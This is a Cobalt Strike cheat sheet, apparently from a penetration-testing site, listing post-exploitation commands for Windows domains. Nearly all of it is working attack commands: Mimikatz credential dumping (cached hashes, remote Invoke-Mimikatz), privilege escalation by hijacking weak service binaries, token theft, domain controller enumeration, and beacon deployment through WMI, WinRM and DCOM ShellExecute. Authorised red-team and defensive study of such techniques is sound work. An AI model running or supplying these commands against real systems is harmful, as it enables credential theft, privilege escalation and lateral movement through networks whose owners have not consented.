
The Cloud Source for Client Engagement Resources
CobaltStrike Cheat Sheet
User Integrity Context Methods:
Determine Integrity Mode:
-
whoami /groups
-
getuid
​​
Locate User High-Integrity Access on Host(s):
-
powershell-import /root/cobaltstrike/scripts/PowerSploit/Recon/PowerView.ps1
-
powershell Invoke-FindLocalAdminAccess
​​
Determine High-Integrity on Remote Host(s):
-
shell dir \\[host]\c$ -- If denied then no!
​​
Obtain High-Integrity on Remote Host(s):
-
net use \\[Host]\c$ /user:[domain]\[usr] [pwsd]
-
spawnas [domain]\[usr] [pswd]
-
make-token [domain]\[usr] [pswd]
​​
Identify Domain Controllers:
-
net dclist -- Lists all DC's in beacon's domain
-
shell net view /DOMAIN -- List the name of the domain
-
shell nltest /dclist:[domain] -- Lists DC in the beacon domain
-
x64 beacon: shell c:\windows\sysnative\nltest /dclist​
-
-
shell nslookup [dc-host-name] -- Lists DC IP​
​
Misc TTP's:
​
Locate Sensitive Information:
-
powershell-import /root/cobaltstrike/scripts/PowerSploit/Recon/PowerView.ps1
-
powershell Invoke-ShareFinder
​
Using Mimikatz to Suspend Services:
-
Locate PID of Services to Suspend
-
mimikatz process::suspend [svc-PID]
-
mimikatz process::resume [svc-PID]
​
Mimikatz Dump Cached Creds:
-
mimikatz !lsadump::cache -- Note: hashcat format: 2100 ; hash output format: hash:username
​
Integrity Context Theft Methods:
Locate Privsec Opportunities:
-
powershell-import /root/cobaltstrike/artifact/PowerSploit/Privesc/PowerUp.ps1
-
powershell Invoke-AllChecks
-
Identify Opportunities...​
-
​​
Weak Service Abuses:
-
Copy Svc name (to temp.txt) -- Invoke-AllChecks
-
Windows EXE (s) | Windows Service | SMB beacon
-
cd c:\users\[usr] -- path with r/w/x access
-
upload [/path/2/svc.exe]
-
shell sc config [Weak-svc] binpath= c:\users\[usr]\[scv.exe]
-
shell sc stop [Weak-svc] -- wait till signal stopped!
-
shell sc start [Weak-svc] -- wait 5-10 sec.
-
link [parent-beacon] -- (e.g. 127.0.0.1, thunder, dc01, etc...)
​
Token Theft (req * beacon):
-
ps -- list process, locate high-integrity PID
-
steal_token [pid]
-
perform action(s) w/i beacon
-
-
rev2self -- reverts to prior user context
​​
WMI Methods:
-
Deploy Beacon:
-
​wmic /user:"domain\username" /password:"mypasssword" /node:192.168.1.1 process call create “cmd.exe /c ps1liner-text”
-
​​
WinRM (Remote PS Mgt) Methods:
-
Look for port 5985 !! -- WinRM default port
-
Deploy Beacon:
-
powershell Invoke-Command -ComputerName [Tgt-host] -ScriptBlock { paste ps1liner or cmd here... } -- Note: Braces in Scriptblock are require to contain cmd
-
-
Inject MimiKatz:​​​
-
​powershell-import /root/cobaltstrike/scripts/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
powershell Invoke-Mimikatz -ComputerName [Tgt-host] -- Note: Ensure hashes / Creds are listed in CBS | Creds or manually add as needed
-
​​
.Net Remote Code Execution Method (via PS):
-
Set User Context on Remote Host:
-
​PS> runas /netonly /user:domain\username "powershell.exe"
-
-
Execute Code on Remote Host (from PS> prompt):
-
​$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"192.168.1.1")
-
$obj = [System.Activator]::CreateInstance($com)
-
$obj.Document.Application.ShellExecute("cmd.exe","/c ps1liner",$null,0)
-
Pentest-Zen (ExitC0de00c.com)
